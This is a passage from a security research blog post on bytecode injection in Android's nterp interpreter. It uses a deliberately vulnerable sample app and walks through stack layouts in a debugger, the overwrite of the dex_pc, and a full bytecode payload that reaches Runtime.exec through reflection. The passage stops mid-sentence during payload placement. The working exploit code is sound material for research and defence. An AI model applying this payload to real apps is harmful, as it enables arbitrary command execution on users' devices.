Bytecode Injection (Part 3)
With all the basics out of the way, this blog post shows the first bytecode - based exploitation technique on Android: bytecode injection! This opens the door to many interesting exploits, where injected bytecode can function as a one - in - all solution or an intermediate stage.
In order to fully understand this technique, it is recommended to read the introductory blog posts first! As of writing, there is no public information on this topic except for the Android source code.
Motivation
When exploiting a memory error, several security mechanisms must be bypassed. These include, but are not limited to, DEP/N^X, ASLR, RELRO, Canaries, and, if you are unlucky, ShadowStack, CFI and SafeStack. Notice that these security mechanisms have not been developed all at once, but rather one by one in response to emerging exploitation techniques. For example, native code injection on the stack caused the stack to be mapped with rw-
instead of rwx
. Another example is ASLR being a response to return - into - libc and ROP. This is called the arms race in binary exploitation, where a response from the offensive security community triggers a response from the defensive security community and vice versa.
Unfortunately, native code is not the only resource that can be executed. Notice that native code is basically interpreted by the CPU. With that in mind, other interpreters can be investigated and analysed for whether they allow particular exploitation techniques. In case of this blog series, Android’s interpreter nterp
is analysed for parallels to the exploitation techniques of native code.
The general motivation for why other interpreters are interesting in the context of exploitation techniques is simple: most security mechanisms are interpreter - specific, i.e. specific to execution environment (architecture, OS, …). For example, DEP/N^X enforces that pages are never rwx
(for the sake of the example, ignore JIT). Hence, native code injection is not feasible. However, changing the interpreter to nterp
also changes the entire execution environment an attacker is working with. As we see later on, no one prevents an attacker from injecting and executing bytecode. In other words, most security mechanisms for one interpreter do not generalize to other interpreters.
The Problems
Although impossible to prove with concrete references, I claim that nterp
does not distinguish data and code. In other words, whatever the dex_pc
is set to is interpreted. This is exactly what had happened decades ago with native code! Identical to early days of binary exploitation, given the ability to redirect control - flow through a memory error, nterp
can be forced to execute whatever an attacker desires.
Consider the following example. In a setting where an attacker gets access to a stack pointer and the ability to repeatedly exploit a stack - buffer index out - of - bounds write, with bytecode, it is possible to construct an exploit. Even worse, directly using classical native - level techniques like ROP seems infeasible, because ROP needs leaks on executable memory regions. So, bytecode injection opens new avenues for exploitation!
While the above example works for a remote attacker, a local attacker is not even constrained by ASLR, because of Android’s fork server architecture. A local attacker in the above example enables ROP and boosts bytecode injection, because a lot of data is identical over multiple apps.
Sample App
For this blog post, we construct a simple, deliberately vulnerable app with
- a repeatable stack - buffer index out - of - bounds write primitive, and
- a single stack address leak.
The idea is to create a scenario where e.g. ROP is infeasible and bytecode injection is simple. Not only does this approach ease understanding nuances of bytecode - based exploitation, but it also shows that bytecode injection is not superfluous, i.e. it is a new tool in an attacker’s tool box.
Notice that the app assumes a remote attacker, which is facilitated using simple socket I/O. In practice, an attacker may serve a malicious website that exploits a bug in V8 or perform a MITM attack on the communication of the target app and a backend server. Now, consider the following, relevant app snippets.
private void run() {
while (true) {
try {
Log.d(TAG, "Initializing server....");
this.initServer();
Log.d(TAG, "Setting up connection....");
this.setupConnection();
// Send leak
this.writeLong(MainActivity.leakStack());
// Loop until user wants to exit
while (this.readBool()) {
// Receive index and value for stack oob
MainActivity.writeIndexed(this.readInt(), this.readLong());
}
} catch (final IOException e) {
e.printStackTrace();
} finally {
this.close();
}
if (!stayAlive) {
break;
}
Log.d(TAG, "Restarting server socket....");
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
new Thread(this::run).start();
}
}
public static native long leakStack();
public static native void writeIndexed(int index, long value);
Below are the vulnerable, native methods invoked in the above Java code. The memory errors, i.e. a unique stack pointer leak and a repeatable stack - buffer index out - of - bounds write, manifest at the JNI layer.
extern "C"
JNIEXPORT jlong JNICALL
Java_com_poc_poc_1remote_MainActivity_leakStack(JNIEnv *env, jclass clazz) {
uint64_t i;
return (uint64_t)&i;
}
extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
jint index, jlong value)
__attribute__ ((optnone)) {
uint64_t i;
uint64_t *buffer = &i;
buffer[index] = value;
}
For some reason optimizations for writeIndexed
had to be disabled, probably because some data - flow analysis in the compiler realized that the code does not really do anything meaningful, i.e. no (direct) outputs. However, this suffices for the purpose of proving that bytecode injection is possible.
With the above setup, a remote attacker can connect to the vulnerable app and repeatedly write on the stack. Moreover, an attacker is able to construct data structures and references to these structures on the stack, yielding a powerful primitive especially for data - oriented attacks.
Building the app in release mode with default Android Studio settings yields an .apk
file, which is actually a .zip
file.
$ unzip app-release.apk
$ ls
AndroidManifest.xml assets classes.dex DebugProbesKt.bin kotlin lib META-INF res resources.arsc
There is only a single classes.dex
file that must account for all Java code in the app. Moreover, the classes.dex
file must contain some of the framework - related bytecode, types etc. required to launch the app. Therefore, the context of e.g. MainActivity::run
is classes.dex
. What is more is that classes.dex
holds a lot more types and methods than are used to program the sample app. A quick .dex
file analysis reveals that classes.dex
indeed holds additional types and methods.
> file --file unpacked_poc_remote/classes.dex --type DEX
classes.dex> list types --regex java/lang/Runtime
[Index = 0x1507]: java/lang/Runtime
[Index = 0x1508]: java/lang/RuntimeException
classes.dex> list methods --regex "Runtime::getRuntime"
[Index = 0xa6ee]: java/lang/Runtime java/lang/Runtime::getRuntime()
Before delving into exploitation, lets see how the native methods are invoked by MainActivity::run
. To increase readability, Lcom/poc/poc_remote/MainActivity
is replaced with LMainActivity
, where L
indicates an object type, and some formatting is done.
classes.dex> list methods --regex "MainActivity::run"
[Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
private void MainActivity::run()
[Index = 0xa51d]:
void MainActivity::run()
classes.dex> decompile method --index 0xa51d
[Index = 0xa51d, Offset = 0x37db10, Num Regs = 0x4]:
private void MainActivity::run()
...
001e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->setupConnection()V
0024: INVOKE_STATIC {}, METHOD:LMainActivity;->leakStack()J
002a: MOVE_RESULT_WIDE v0
...
003e: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readInt()I
0044: MOVE_RESULT v0
0046: INVOKE_DIRECT {v3}, METHOD:LMainActivity;->readLong()J
004c: MOVE_RESULT_WIDE v1
004e: INVOKE_STATIC {v0, v1, v2}, METHOD:LMainActivity;->writeIndexed(I,J)V
0054: GOTO +-17
...
Basically, invocations of MainActivity::leakStack
and MainActivity::writeIndexed
use the invoke-static
instruction. This is not surprising, because both methods are declared using the static
keyword. Unfortunately it is unclear why writeIndexed
is given v2
as a third parameter. Overall, bytecode is used to execute native methods, and thus execution must eventually continue in bytecode after the native methods are done executing.
Note: Offsets are in terms of code units. In the above code snippet, the
GOTO +-17
actually references0x54 + 2 * (-17) = 0x32
. In general, each instruction uses a multiple of code units bytes, which means instruction offsets and addresses are always two - byte aligned!
Bytecode Injection
From a previous blog post, we know that the bytecode return address lies on the stack. So, the layout of nterp
and JNI
stack frames can be used to identify what critical data is in close proximity to the oob write. Below is an excerpt from a particular app execution.
gef➤ canary
[+] The canary of process 9862 is at 0x7ff247af28, value is 0xe009ee421ed97f00
gef➤ i r sp
sp 0x7c0fe66620 0x7c0fe66620
gef➤ hexdump qword $sp --size 0x28
0x7c0fe66620 │+0x0000 0x0013000000000000 // <-- $sp
0x7c0fe66628 │+0x0008 0x0000007c0fe66650
0x7c0fe66630 │+0x0010 0x0013000000000000
0x7c0fe66638 │+0x0018 0x0000020000000000
0x7c0fe66640 │+0x0020 0x0000007f27664480
0x7c0fe66648 │+0x0028 0xb400007d48b969f0
0x7c0fe66650 │+0x0030 0x0000000000000000
0x7c0fe66658 │+0x0038 0x66f0649020037d8d // Stack canary
0x7c0fe66660 │+0x0040 0x0000007c0fe66758 // Old base pointer (x29)
0x7c0fe66668 │+0x0048 0x0000007c14c741ac // Return address (x30)
0x7c0fe66670 │+0x0050 0x0000007f27664480 // ArtMethod* <---- END OF JNI FRAME
0x7c0fe66678 │+0x0058 0x0000007c0fe66748 // Padding? (Vrefs of calling method)
0x7c0fe66680 │+0x0060 0x0000000000000000 // Padding
0x7c0fe66688 │+0x0068 0x0000000000000000 // Padding? Expected d0-d7
0x7c0fe66690 │+0x0070 0x0000000000000000 // x1
0x7c0fe66698 │+0x0078 0x0000000000000000 // x2
0x7c0fe666a0 │+0x0080 0x0000000000000000 // x3
0x7c0fe666a8 │+0x0088 0x0000000000000000 // x4
0x7c0fe666b0 │+0x0090 0x0000000000000000 // x5
0x7c0fe666b8 │+0x0098 0x0000000000000000 // x6
0x7c0fe666c0 │+0x00a0 0xb400007df8b82a10 // x7
0x7c0fe666c8 │+0x00a8 0x0000000000000000 // Marking Register (MR, x20)
0x7c0fe666d0 │+0x00b0 0xb400007df8b82ad0 // Suspend (x21)
0x7c0fe666d8 │+0x00b8 0x0000007c147a64be // dex_pc_ptr (PC, x22)
0x7c0fe666e0 │+0x00c0 0x0000007c14a867f3 // Current Instruction (INST, x23)
0x7c0fe666e8 │+0x00c8 0x0000007c87400880 // Table of bytecode handlers (IBASE, x24)
0x7c0fe666f0 │+0x00d0 0x0000007c0fe66748 // VRefs (REFS, x25)
0x7c0fe666f8 │+0x00d8 0x0000007c0fe66758 // x26 (informally: vregs)
0x7c0fe66700 │+0x00e0 0x0000007c0fe66748 // x27
0x7c0fe66708 │+0x00e8 0x0000007c0fe66770 // x28
0x7c0fe66710 │+0x00f0 0x0000007c0fe66758 // FP (x29)
0x7c0fe66718 │+0x00f8 0x0000007c87409aa0 // Return address (x30)
0x7c0fe66720 │+0x0100 0x0000007f27664440 // ArtMethod* <---- END OF NTERP FRAME
0x7c0fe66728 │+0x0108 0x0000007f276071e0 // ArtMethod*
0x7c0fe66730 │+0x0110 0x0000007c147a62a8 // Alignment? may be a dex pc
0x7c0fe66738 │+0x0118 0x0000007c147a64be // dex_pc_ptr
0x7c0fe66740 │+0x0120 0x0000007c0fe66770 // Caller Frame Pointer (FP)
0x7c0fe66748 │+0x0128 0x0000000000000000 // Vrefs
0x7c0fe66750 │+0x0130 0x12f8084800000000
0x7c0fe66758 │+0x0138 0x0000000000000200 // Vregs
0x7c0fe66760 │+0x0140 0x12f8084800130000
Surprisingly, the JNI frame is slightly modified, as the above instance does not contain spilled floating point registers d0
to d7
. However, as the comment
in the JNI frame states, only a generic JNI frame is described, not concrete frames for every possible invocation scenario. An interesting observation is that gef
claims the canary is 0xe009ee421ed97f00
, but the disassembly of writeIndexed
suggests the canary is 0x66f0649020037d8d
. Apparently, Android’s Bionic library uses random canaries
, which also seems to apply to Android’s runtime. Further, there are two instances of a dex_pc_ptr
! From top to bottom, the first one is part of the spilled registers in the JNI frame, so it will be put back into x22
upon return to the calling method. The second one seems to be stored and managed in the nterp
frame. Maybe this is used to ensure that x22
can be restored on function invocations where x22
is not spilled.
Lets verify that bytecode execution continues at whatever value is stored in the spilled x22
on the stack. Basically, we can overwrite the value with something arbitrary, like 0x4242424242424242
!
gef➤ set *(unsigned long long*)0x0000007c0fe666d8=0x4242424242424242
gef➤ c
Continuing.
Thread 20 "Thread-2" received signal SIGSEGV, Segmentation fault.
...
$x22 : 0x4242424242424242 ("BBBBBBBB"?)
...
→ 0x7c87409ac0 <nterp_helper+1984> ldrh w23, [x22, #6]! // x23 = xINST (next opcode)
0x7c87409ac4 <nterp_helper+1988> and x16, x23, #0xff // x16 = first byte of next instruction
0x7c87409ac8 <nterp_helper+1992> add x16, x24, x16, lsl #7 // x16 = IBASE + opcode * <bytecode handler size>
0x7c87409acc <nterp_helper+1996> br x16 // branch to handler
So, nterp
tries to use the spilled register value to derive the next bytecode instruction. Thus, overwriting this value enables an attacker to redirect bytecode control - flow to any location. Most importantly, bytecode execution can be pivoted to a controlled location. In this case: the stack. Of course, either the dex_pc_ptr
must be set to addr_payload-6
or the first three instructions should be NOP
s to account for the added 6
in the faulting instruction, i.e. the size of the invoke-static
instruction used to invoke writeIndexed
.
With the ability to control where nterp
continues execution, it remains to figure out what to execute.
Building a Bytecode Payload
First of all, the goal must be clarified. In this case, the goal is command execution in the context of the vulnerable app using only bytecode. However, gaining native code execution using bytecode as intermediate stage to set up e.g. the stack is also possible. Command execution is chosen, because it involves calling at least one legitimate method. Therefore, showing that command execution is possible also proves that bytecode injection is capable of invoking normal library or application - specific methods, despite coming from a memory error. For simplicity, we try to get the following Java code directly in bytecode.
Runtime.getRuntime().exec("log Hello");
Naively translating this to bytecode, e.g. by creating a PoC app, building it and decompiling the .apk
file or using d8
, yields the first payload version.
classes.dex> list methods --regex Runtime::getRuntime
[Offset = 0x0]: classes.dex
[Index = 0xa254]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "MainActivity::simpleShellcode"
[Offset = 0x0]: classes.dex
[Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
private void MainActivity::simpleShellcode()
[Index = 0xa097]:
void MainActivity::simpleShellcode()
classes.dex> decompile method --index 0xa097
[Index = 0xa097, Offset = 0x363638, Num Regs = 0x2]:
private void MainActivity::simpleShellcode()
0000: INVOKE_STATIC {}, METHOD:LRuntime;->getRuntime()LRuntime;
0006: MOVE_RESULT_OBJECT v1
0008: CONST_STRING v0, STRING:"log Hello"(14)
000c: INVOKE_VIRTUAL {v1, v0}, METHOD:LRuntime;->exec(LString;)LProcess;
0012: RETURN_VOID
With such a payload at hand, one may be tempted to copy it over and try it! However, as another app is used to construct this payload, most certainly type and method indices are incorrect. An example is that invoke-static
invokes the Runtime::getRuntime
method with index 0xa254
. From a previous section
it is known that the sample app uses Runtime::getRuntime
with index 0xa6ee
. Therefore, these indices are incompatible. The same holds for the String
constant "log Hello"
. Most certainly the vulnerable app does not even contain such a String
constant! Therefore, to get command execution using Runtime.getRuntime().exec("...")
, we need to construct a payload that is more dynamic. To that end, we strive for the following properties:
- dynamic
String
instances - dynamic method invocation
Using a different app is helpful to get the overall payload layout and avoids having to deal with e.g. register allocations. However, a context is often app - specific, which must be considered during payload construction.
Dynamic Strings
As discussed in a previous blog post, the instruction fill-array-data
can be used to fill an array with data directly located inside the bytecode. So, long story short, an arbitrary char[]
can be constructed using fill-array-data
. For this to work, an attacker needs to know the type index of a char[]
. Luckily, the char[]
type is used frequently, so it most likely resides in any .dex
we encounter. For a start the payload looks like below:
new-array v0, <length>, char[]
fill-array-data v0, +<byte offset//2>
...
[fill-array-data-payload]
ident=0x0300
element_width=0x2
size=len(command)
data=[ command[0], ..., command[-1] ]
From now on, assume an attacker has a char[]
instance describing a command, like "log Hello"
. The next step is to construct a String
from a char[]
. On Android, StringBuilder
is the type of choice. Again, it is used so frequently that every .dex
file is expected to contain the corresponding type. The main challenge is whether StringBuilder::append(char[])
exists. In case of the vulnerable app it does, but it may not be the case for another app. If there is no way to construct a String
from bytecode, an attacker can also inject a fake String
object (see next post regarding bytecode reuse). Continuing with the StringBuilder
, consider the following analysis:
classes.dex> list types --regex "StringBuilder"
[Index = 0x150f]: StringBuilder
classes.dex> list methods --regex "StringBuilder::append"
[Index = 0xa750]: StringBuilder StringBuilder::append([C)
classes.dex> list methods --regex "StringBuilder::<init>"
[Index = 0xa741]: void StringBuilder::<init>()
classes.dex> list methods --regex "StringBuilder::toString"
[Index = 0xa75d]: String StringBuilder::toString()
As the name suggests, StringBuilder::<init>()
is the constructur of StringBuilder
that does not take any parameters. In Java, invoking this constructor is done via new StringBuilder()
. Overall, the following Java snippet describes what we try to do directly in bytecode:
char[] c = new char[] {'l', 'o', 'g', ' ', 'H', 'e', 'l', 'l', 'o'};
StringBuilder b = new StringBuilder();
b.append(c);
String command = b.toString();
Putting together all the pieces and equipped with the bytecode documentation and a sample app for payload creation, the following bytecode can be constructed:
0000: CONST_16 v0, #+<len(command)>
0004: NEW_ARRAY v0, v0, TYPE:char[]
0008: FILL_ARRAY_DATA v0, +<offset to command data // 2>
000e: NEW_INSTANCE v1, TYPE:StringBuilder
0012: INVOKE_DIRECT {v1}, METHOD:StringBuilder-><init>()
0018: INVOKE_VIRTUAL {v1, v0}, METHOD:StringBuilder->append(char[])
001e: INVOKE_VIRTUAL {v1}, METHOD:StringBuilder->toString()
0024: MOVE_RESULT_OBJECT v2
...
offset command data: [fill-array-data-payload]
After the above bytecode is executed, v2
contains a reference to a String
object with contents "log Hello"
. Notice that this bytecode is independent of the String’s semantics, i.e. this is a generic approach for constructing a String
instance from a char[]
and not specific to a system command! The only components that need to change for a new String are length fields and the array contents. Of course, one may have to use new vregs to prevent existing vregs from being clobbered.
Note: Calling the constructor on a newly created instance is sometimes optional. If the goal is to create a valid object, then one may only use
new-instance
, which means the index of the constructor method can be ignored. Of course, using the object later on may cause unexpected behaviour, including crashes.
Problem with String Constructors
One might ask why StringBuilder::append(char[])
is preferred over String::<init>(char[])
. This is motivated by the fact that String
s are disabled
on Android. At least the source code suggests that StringFactory
should be used instead of the String
type directly:
public String(char value[]) {
// BEGIN Android-changed: Implemented as compiler and runtime intrinsics.
/*
this(value, 0, value.length, null);
*/
throw new UnsupportedOperationException("Use StringFactory instead.");
// END Android-changed: Implemented as compiler and runtime intrinsics.
}
Therefore, we directly use the StringBuilder
type, also because it is used frequently and easy to use. Notice that although String
constructors cannot be easily used, this does not imply that the String
type occurs less frequently!
Dynamic Method Invocation
The problem to solve is as follows. Goal is to call Runtime.getRuntime().exec(command)
, but it cannot be assumed that the context of the bytecode provides the method indices for getRuntime
and exec
. Actually, Runtime.getRuntime()
is very common, because it occurs in the context, although the method and Runtime
type are not explicitly used in the vulnerable app:
classes.dex> list types --regex "Runtime"
[Index = 0x1507]: Runtime
classes.dex> list methods --regex "Runtime::getRuntime"
[Index = 0xa6ee]: Runtime Runtime::getRuntime()
classes.dex> list methods --regex "Runtime::exec"
classes.dex>
Unfortunately, Runtime::exec
is not very common. Luckily, Java provides a feature called reflection. Obviously, the name of the function to be invoked is known, i.e. "exec"
. So, in Java, dynamically resolving the method looks like so:
Runtime.getRuntime().getClass().getDeclaredMethod("exec", [String.class]);
As can be seen in the above examples, including dynamic String
creation, successful bytecode creation involves a lot of creativity and thinking out - of - the - box to find semantically fitting bytecode instruction sequences that use as few context - specific resources as possible. While it is possible to use Java code to construct the initial bytecode layout, indices etc. must be adjusted to fit the context. Bytecode generated from Java code may use e.g. types that are not available in the context.
The String
type is also very common, so it can be assumed to be available in all .dex
files and thus in every context an attacker encounters. With all that, the bytecode can be seen below. Notice that v6 := "exec"
.
003a: INVOKE_STATIC {}, METHOD:Runtime->getRuntime()
0040: MOVE_RESULT_OBJECT v4
0042: INVOKE_VIRTUAL {v4}, METHOD:Object->getClass()
0048: MOVE_RESULT_OBJECT v5
0052: CONST_4 v7, #+1
0054: NEW_ARRAY v7, v7, TYPE:[Class
0058: CONST_4 v8, #+0
005a: CONST_CLASS v9, TYPE:String
005e: APUT_OBJECT v9, v7, v8
0062: INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Class->getDeclaredMethod(String,Class[])
An alternative approach may be to use Runtime.class.getDeclaredMethod(...)
. However, we need the instance of Runtime
for invocation of exec
. This approach may save us the getClass
invocation, although this would most likely be replaced with an equivalent instruction.
What is left to do is to invoke the resolved method. Of course, invocation depends on what parameters the target method expects. The below code snippet continues with calling exec
.
0068: MOVE_RESULT_OBJECT v5
006a: v6 := "log Hello" ...
0072: FILLED_NEW_ARRAY {v6}, TYPE:[LObject;
0078: MOVE_RESULT_OBJECT v6
007a: INVOKE_VIRTUAL {v5, v4, v6}, METHOD:LMethod;->invoke(LObject;,[LObject;)
For simplicity, I omitted the creation of the "log Hello"
command.
Observe that dynamically invoking methods using reflection requires knowledge of specific type and method indices, among which are:
Class[]
,String
andObject[]
type indicesRuntime::getRuntime()
,Object::getClass()
,Class::getDeclaredMethod(String, Class[])
andMethod::invoke(Object, Object[])
method indices
With the above approaches, i.e. dynamic strings and method invocations, it is possible to get command execution using only bytecode from a memory error in a vulnerable app. Or so you may think, but the execution environment is cruel, especially as regards vreg allocations!
Limited, dynamic Vregs
A method specifies the amount of vregs needed to work in its associated code_item
. When executing a method, nterp
allocates as many vregs (and vrefs) as specified on the stack. Now, what happens if the hijacked method requested 4
vregs, but the payload uses 10
? As has been discussed in a previous blog post, vregs and vrefs have the following properties:
- Vrefs array precedes vregs array on stack.
- Vrefs array is adjacent to vregs array.
- Vrefs and vregs are parallel and entries are semantically linked. For example, vreg
v0
is linked to vrefr0
. - Vrefs and vregs array accesses are not bounds - checked.
Continuing the example, accessing vregs v0
to v3
is legitimate. However, accessing v4
is problematic. In case the access to v4
is a write, then r4
will most likely also be overwritten. The problem is that r4
accesses the first value after the actual vrefs array, i.e. v0
. Therefore, if something is stored into v0
and then e.g. a constant is written to v4
, then v0
will be modified, in this case set to 0
. Also, the first 32-bit value after vregs is changed to be the constant assigned to v4
. This has the neat side - effect that an attacker can fully read and write stack values located after vrefs and vregs, enabling attacks like JITROP. From a bytecode perspective, depending on the amount of registers used in the payload, this is problematic, because registers holding important data like Runtime
instance may be clobbered.
This is where math can save the day! Say the hijacked method requested N
vregs. Then, the first overlap happens at v<N>
, because this may also set r<N>
, which overlaps with v0
. So, to prevent overflowing into the vregs, an access to v<N>
can be set to v<N+N>
. This skips over the entire vregs array, and thus reinterprets the region after vregs as a fresh vrefs - vregs array pair. Hence, the mapping is N -> N+N
, but what happens in case v<N+1>
or v<N+2>
are accessed? And what about v<N+N+N+2>
? To resolve this problem, observe that each block, i.e. vregs accesses that do not overflow into the following block, is of size N * 2
. The first block consists of the original vrefs and vregs, in that order, each of length N
. Say the payload needs M
vregs to work. Then the number of blocks is k := M // N + 1
, where //
is integer - division. Also, for a vreg index X
, compute the offset into a block as X % N
. Now, if vreg v<X>
with 0 <= X < M
is to be accessed, then compute block id X // N
and offset X % N
. The actual vreg access is then v<(X // N) * (N * 2) + (X % N)>
. To summarize,
X // N
: Block idN * 2
: Block size in register entriesX % N
: Offset within a block
Consider the following visualization for the case where the payload uses 10
vregs, the hijacked method only allocated memory for 4
vregs, and the payload tries to access vreg v4
. Of course, whatever data overlaps with the artificial blocks is corrupted. Hence, care must be taken when using this approach. Luckily, blocks can be shifted up the stack until no critical data is overwritten.
With a simple function, this can be abstracted away, so we never have to do math again:
v = lambda i: (i // available_vregs) * (2 * available_vregs) + (i % available_vregs)
v0 = v(0)
v1 = v(1)
v2 = v(2)
v3 = v(3)
v4 = v(4)
The Payload
Finally, with all caveats aside, the final payload can be constructed. It is beneficial to implement a BytecodeBuilder
, which dynamically builds bytecode based on the documentation
. This eases testing and constructing different kinds of payloads! In this case study, the payload can be fully expressed like below. Note that the comments do not always show the correct indices, lengths and offsets. Most of these values are computed dynamically or change with the payload size and layout. Also, another app is used to generate the payload layout and avoid having to deal with register allocations. The app is forced to use the tricks for dynamic strings and method invocations on Java - level.
builder = BytecodeBuilder(type_map={
'char[]': char_array_index,
'StringBuilder': stringbuilder_index,
'Class[]': classarray_index,
'String': string_index,
'Object[]': objectarray_index,
'Object': object_index,
})
# [Index = 0x5, Offset = 0x31c, Num Regs = 0xa]: private static void com/poc/shellcode/MainActivity::shellcode()
return (builder
# 0000: 13 00 12 00 CONST_16 v0, #+18
.const_16(v0, len(command))
# 0004: 23 00 13 00 NEW_ARRAY v0, v0, TYPE:[C
.new_array(v0, v0, 'char[]')
# 0008: 26 00 3e 00 00 00 FILL_ARRAY_DATA v0, +62
.fill_array_data(v0, 65)
# 000e: 22 01 0d 00 NEW_INSTANCE v1, TYPE:Ljava/lang/StringBuilder;
.new_instance(v1, 'StringBuilder')
# 0012: 70 10 0b 00 01 00 INVOKE_DIRECT {v1}, METHOD:Ljava/lang/StringBuilder;-><init>()V
.invoke_direct(1, stringbuilder_constructor_index, [v1])
# 0018: 6e 20 0c 00 01 00 INVOKE_VIRTUAL {v1, v0}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
.invoke_virtual(2, stringbuilder_append_chararray_index, [v1, v0])
# 001e: 12 42 CONST_4 v2, #+4
.const_16(v2, 4)
# 0020: 23 22 13 00 NEW_ARRAY v2, v2, TYPE:[C
.new_array(v2, v2, 'char[]')
# 0024: 26 02 46 00 00 00 FILL_ARRAY_DATA v2, +70
.fill_array_data(v2, 65)
# 002a: 22 03 0d 00 NEW_INSTANCE v3, TYPE:Ljava/lang/StringBuilder;
.new_instance(v3, 'StringBuilder')
# 002e: 70 10 0b 00 03 00 INVOKE_DIRECT {v3}, METHOD:Ljava/lang/StringBuilder;-><init>()V
.invoke_direct(1, stringbuilder_constructor_index, [v3])
# 0034: 6e 20 0c 00 23 00 INVOKE_VIRTUAL {v3, v2}, METHOD:Ljava/lang/StringBuilder;->append([C)Ljava/lang/StringBuilder;
.invoke_virtual(2, stringbuilder_append_chararray_index, [v3, v2])
# 003a: 71 00 09 00 00 00 INVOKE_STATIC {}, METHOD:Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
.invoke_static(0, getruntime_index, [])
# 0040: 0c 04 MOVE_RESULT_OBJECT v4
.move_result_object(v4)
# 0042: 6e 10 08 00 04 00 INVOKE_VIRTUAL {v4}, METHOD:Ljava/lang/Object;->getClass()Ljava/lang/Class;
.invoke_virtual(1, object_getclass_index, [v4])
# 0048: 0c 05 MOVE_RESULT_OBJECT v5
.move_result_object(v5)
# 004a: 6e 10 0d 00 03 00 INVOKE_VIRTUAL {v3}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
.invoke_virtual(1, stringbuilder_tostring_index, [v3])
# 0050: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 0052: 12 17 CONST_4 v7, #+1
.const_16(v7, 1)
# 0054: 23 77 14 00 NEW_ARRAY v7, v7, TYPE:[Ljava/lang/Class;
.new_array(v7, v7, 'Class[]')
# 0058: 12 08 CONST_4 v8, #+0
.const_16(v8, 0)
# 005a: 1c 09 0c 00 CONST_CLASS v9, TYPE:Ljava/lang/String;
.const_class(v9, 'String')
# 005e: 4d 09 07 08 APUT_OBJECT v9, v7, v8
.aput_object(v9, v7, v8)
# 0062: 6e 30 07 00 65 07 INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;,[Ljava/lang/Class;)Ljava/lang/reflect/Method;
.invoke_virtual(3, class_getdeclaredmethod_index, [v5, v6, v7])
# 0068: 0c 05 MOVE_RESULT_OBJECT v5
.move_result_object(v5)
# 006a: 6e 10 0d 00 01 00 INVOKE_VIRTUAL {v1}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
.invoke_virtual(1, stringbuilder_tostring_index, [v1])
# 0070: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 0072: 24 10 15 00 06 00 FILLED_NEW_ARRAY {v6}, TYPE:[Ljava/lang/Object;
.filled_new_array(1, 'Object[]', [v6])
# 0078: 0c 06 MOVE_RESULT_OBJECT v6
.move_result_object(v6)
# 007a: 6e 30 0f 00 45 06 INVOKE_VIRTUAL {v5, v4, v6}, METHOD:Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;,[Ljava/lang/Object;)Ljava/lang/Object;
.invoke_virtual(3, method_invoke_index, [v5, v4, v6])
# 0080: 0e 00 RETURN_VOID
.return_void()
# 0082: 00 00 NOP
.nop()
# 0084: ARRAY_PAYLOAD Array@{108, 111, 103, 32, 34, 104, 101, 108, 108, 111, 32, 116, 104, 101, 114, 101, 33, 34}
.array_payload(2, len(command), command_buffer)
# 00b0: ARRAY_PAYLOAD Array@{101, 120, 101, 99}
.array_payload(2, 4, b'e\x00x\x00e\x00c\x00')).build()
The java equivalent could look something like this:
char[] cCommand = new char[] { <command> };
StringBuilder bCommand = new StringBuilder();
bCommand.append(cCommand);
char[] cExec = new char[] {'e', 'x', 'e', 'c'};
StringBuilder bExec = new StringBuilder();
bExec.append(cExec);
Runtime runtime = Runtime.getRuntime();
Class<?> runtimeClass = runtime.getClass();
String execName = bExec.toString();
Class[] signature = new Class[] { String.class };
Method exec = runtimeClass.getDeclaredMethod(execName, signature);
String command = bCommand.toString();
Object[] args = new Object[] { command };
exec.invoke(runtime, args);
The Attack
With a payload at hand, it is time to abuse the memory error and obtain arbitrary command execution in the context of the target app.
Before injecting the bytecode, the leaked stack address must be understood properly in order to find the exact location of the payload. To that end, a particular execution yields a leak of 0x6eb6aec650
. Remember the original C code of writeIndexed
:
extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
jint index, jlong value)
__attribute__ ((optnone)) {
uint64_t i;
uint64_t *buffer = &i;
buffer[index] = value;
}
With that in mind, lets consider the following simplified disassembly of the vulnerable writeIndexed
method:
sub sp, sp, #0x50
stp x29, x30, [sp, #64]
add x29, sp, #0x40 ; frame pointer = sp + 0x40
sub x8, x29, #0x10 ; buffer = frame pointer - 0x10 = sp + 0x30
str x8, [sp, #8]
...
ldr x9, [sp, #8] ; base address
ldrsw x10, [sp, #28] ; index
mov x11, #0x8 ; element size
madd x9, x10, x11, x9 ; where = index * size + base
str x8, [x9] ; indexed write
In a nutshell, the buffer is located 0x10
below the old base pointer and return address. This can be confirmed using a debugger:
gef➤ x/1gx $sp+0x8
0x6eb6aec628: 0x0000006eb6aec650
gef➤ p/x $x29-0x10
$1 = 0x6eb6aec650
Coincidentally, the pointer leaked via leakStack
is exactly the base address of the buffer, relative to which the index oob write happens.
Now, two things must be identified:
- At what index resides the
dex_pc
? - Where is a save location to store the payload to?
The first point is addressed to some degree in a previous section
that showed a reverse - engineered view of the stack taking into account nterp
and JNI stack frames. Therefore, without showing the details of the stack again, the byte offset to write to can be computed by subtracting the buffer base address from the address of the spilled x22
register. Then, because buffer elements are 64
- bit integers, divide by the element size to obtain the final index
(we have an indexed oob write).
gef➤ p/x (0x00006eb6aec6d8 - 0x00006eb6aec650) / 8
$2 = 0x11
Next, the payload must be stored to a stable region on the stack. Most importantly, no data structures required to continue the execution of the (hijacked) bytecode method that called the writeIndexed
method need to be corrupted. So, with some testing, it turns out that the payload may be moved 0x1000
